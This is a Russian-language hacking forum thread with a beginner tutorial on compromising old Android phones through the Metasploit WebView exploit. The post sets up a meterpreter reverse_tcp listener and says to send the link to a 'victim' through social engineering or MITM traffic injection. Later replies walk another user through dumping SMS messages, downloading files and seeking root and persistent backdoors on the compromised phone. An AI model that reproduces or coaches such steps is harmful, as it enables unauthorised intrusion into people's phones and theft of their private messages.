Android WebView Exploit(Или взлом андроида по ссылке)

Тема в разделе "Этичный хакинг и тестирование на проникновение", создана пользователем ~~DarkNode~~, 9 ноя 2016.

Наш партнер Genesis Hackspace
  1. ~~DarkNode~~

    ~~DarkNode~~ ~^_Wired FaLc❍n_^~
    Команда форума Grey Team

    Регистрация:
    19 окт 2016
    Сообщения:
    357
    Симпатии:
    1.121
    Итак всем привет.Пост для совсем новичков)) Бывалые наверняка его юзали, но тут на форуме описания этого эсплойта еще не видел)
    Сегодня мы узнаем о еще одном очень легком способе взлома андроид устройств
    версии не больше (4.2.x)

    Android WebView Exploit(Или взлом андроида по ссылке)

    Если устройства с андроидом выше версии то смотрите эту статью

    И так если вы обнаружили в своем сегменте сети (на одном WiFi к примеру ) или заведомо известно что ваша жертва использует девайс на андроиде версии ниже чем 4.2.x то этот эксплоит вам подойдет.

    И так все что нам понадобиться:
    1)Запустить метасплоит
    2)Выбераем наш эксплойт:

    Android WebView Exploit(Или взлом андроида по ссылке)
    3)Задаем опционально LHOST , LPORT для пейлоада,который по дефолту тот что нам нужен(android/meterpreter/reverse_tcp) URIPATH - текст ссылки который будет идти после IP ,SRVHOST и SRVPORT соотведственно IP и порт на котором будет запущен веб сервер.
    set LHOST наш_ip_адрес
    set LPORT наш_порт_на_котором_будем_ловить_соединение
    set SRVHOST IP__наш_адрес
    set URIPATH текст_ссылки
    exploit -j
    Android WebView Exploit(Или взлом андроида по ссылке)[/URL]Android WebView Exploit(Или взлом андроида по ссылке)[/IMG] Android WebView Exploit(Или взлом андроида по ссылке)
    4)Применяем Соц.Инженерии и даем ссылку жертве или заражаем трафик при МИТМ атаках с инжектом вредоносной ссылки...
    Android WebView Exploit(Или взлом андроида по ссылке)

    5)Ловим метерпретер сессию

    Android WebView Exploit(Или взлом андроида по ссылке)

     
    RIDan, Нурлан, id2746 и ещё 1-му нравится это.
  2. ApplePen

    ApplePen Member

    Регистрация:
    29 окт 2016
    Сообщения:
    21
    Симпатии:
    8
    Я вчера заводил этот эксплоит на 4.4, Lenovo a806
     
  3. xxxcrow

    xxxcrow Active Member

    Регистрация:
    29 ноя 2016
    Сообщения:
    33
    Симпатии:
    2
    ребят, что то у меня ссылку не открывает
    в чем проблема?
     
  4. ~~DarkNode~~

    ~~DarkNode~~ ~^_Wired FaLc❍n_^~
    Команда форума Grey Team

    Регистрация:
    19 окт 2016
    Сообщения:
    357
    Симпатии:
    1.121
    Опишите более подробно свою проблему.
    И было бы неплохо прикрепить скриншот проблемы.
     
  5. xxxcrow

    xxxcrow Active Member

    Регистрация:
    29 ноя 2016
    Сообщения:
    33
    Симпатии:
    2
    простите, уже все нормально))
    ток сейчас проблема, не могу сделать почти ничего, ни дампы не какие, не геолокацию,
    мне кажется это изза того что я priv не могу поставить, говорит что такого фала нет
     
    ~~DarkNode~~ нравится это.
  6. ~~DarkNode~~

    ~~DarkNode~~ ~^_Wired FaLc❍n_^~
    Команда форума Grey Team

    Регистрация:
    19 окт 2016
    Сообщения:
    357
    Симпатии:
    1.121
    Можно предположить что неверно прописаны пути к сохраняемым дампап. Часто это может происходить когда в пути к файлу встречаются пробелы.В таких случаях нужно просто использовать символ слэша \
    Путь к файлу будет выглядит примерно так:
    Код (Text):
    /root/Рабочий\ Стол\sms.txt
     
  7. xxxcrow

    xxxcrow Active Member

    Регистрация:
    29 ноя 2016
    Сообщения:
    33
    Симпатии:
    2
    сейчас у меня вот так :С
    Android WebView Exploit(Или взлом андроида по ссылке)
     
  8. xxxcrow

    xxxcrow Active Member

    Регистрация:
    29 ноя 2016
    Сообщения:
    33
    Симпатии:
    2
    помоему ты не правильно написал))
    а еще что то по русский не писалось, и я в итоге вот так сделал, но все ровно:
    Android WebView Exploit(Или взлом андроида по ссылке)
     
  9. ~~DarkNode~~

    ~~DarkNode~~ ~^_Wired FaLc❍n_^~
    Команда форума Grey Team

    Регистрация:
    19 окт 2016
    Сообщения:
    357
    Симпатии:
    1.121
    Тогда извини)
    Попробуй выполнить команду dump_sms с параметром -o
    Код (Text):
    dump_sms -o /root/sms.txt
     
  10. xxxcrow

    xxxcrow Active Member

    Регистрация:
    29 ноя 2016
    Сообщения:
    33
    Симпатии:
    2
    тоже самое, и так с большенством команд,
    хотя все 1-в-1 делаю как в туториалах (даже как и сам создатель метасплойта(или метерпетера))
    позже попробую с другим телефоном, странно что на этом не работает нормально
    (могу менять файлы и прочее, а вот что то дельное нет, не местоположения ни чего остального подобного)
     
  11. xxxcrow

    xxxcrow Active Member

    Регистрация:
    29 ноя 2016
    Сообщения:
    33
    Симпатии:
    2
    кароче, есть предположение что у метерпретера нет доступа к руту, вот что :D
    как сделать? :D
    и еще вопрос, как СКАЧАТЬ изображение допустим, ну на комп свой?
     
  12. xxxcrow

    xxxcrow Active Member

    Регистрация:
    29 ноя 2016
    Сообщения:
    33
    Симпатии:
    2
    а еще как я понял, после перезагрузки все теряется? :О
     
  13. ~~DarkNode~~

    ~~DarkNode~~ ~^_Wired FaLc❍n_^~
    Команда форума Grey Team

    Регистрация:
    19 окт 2016
    Сообщения:
    357
    Симпатии:
    1.121
    Что именно понимается под словом "Все" ?
    Метасплоит запущен от рута?
    В метерпретере есть команда download
     
  14. xxxcrow

    xxxcrow Active Member

    Регистрация:
    29 ноя 2016
    Сообщения:
    33
    Симпатии:
    2
    метасплоит от рута, да, под словом все подрузамевается ну сессия и сам бекдор ._.

    (на счет скачивания разобрался уже)))

    (я даже только что выгрузил скрипт что бы рут получить для метерпретера)
     
    #14 xxxcrow, 8 дек 2016
    Последнее редактирование: 8 дек 2016
  15. ~~DarkNode~~

    ~~DarkNode~~ ~^_Wired FaLc❍n_^~
    Команда форума Grey Team

    Регистрация:
    19 окт 2016
    Сообщения:
    357
    Симпатии:
    1.121
    Ну естественно,на сегодняшний день мне пока не известно эксплоитов в метасплоите под андроид , да и в целом, которые при эксплуатации сразу же закрепляются в системе.Как минимум это достигается различными модулями пост эксплуатации.
     
  16. xxxcrow

    xxxcrow Active Member

    Регистрация:
    29 ноя 2016
    Сообщения:
    33
    Симпатии:
    2
    а как закрепить? (в голове только одна мысль, сделать бекдор, ток вот как его установить?)
     
  17. ~~DarkNode~~

    ~~DarkNode~~ ~^_Wired FaLc❍n_^~
    Команда форума Grey Team

    Регистрация:
    19 окт 2016
    Сообщения:
    357
    Симпатии:
    1.121
    xxxcrow нравится это.
  18. xxxcrow

    xxxcrow Active Member

    Регистрация:
    29 ноя 2016
    Сообщения:
    33
    Симпатии:
    2
  19. xxxcrow

    xxxcrow Active Member

    Регистрация:
    29 ноя 2016
    Сообщения:
    33
    Симпатии:
    2
  20. ~~DarkNode~~

    ~~DarkNode~~ ~^_Wired FaLc❍n_^~
    Команда форума Grey Team

    Регистрация:
    19 окт 2016
    Сообщения:
    357
    Симпатии:
    1.121
    Прочитай заголовок статьи, думаю логика очевидна что речь идет не про готовый эксплойт из метасплойта, а про то как создать свой бекдор с последующим бекконнектом.
    Что бы достигать целей,нужно немного понимать что и как работает,а не просто один в один по мануалу делать и удивляться почему на выходе ошибка или что то не так)))
     
Загрузка...

Поделиться этой страницей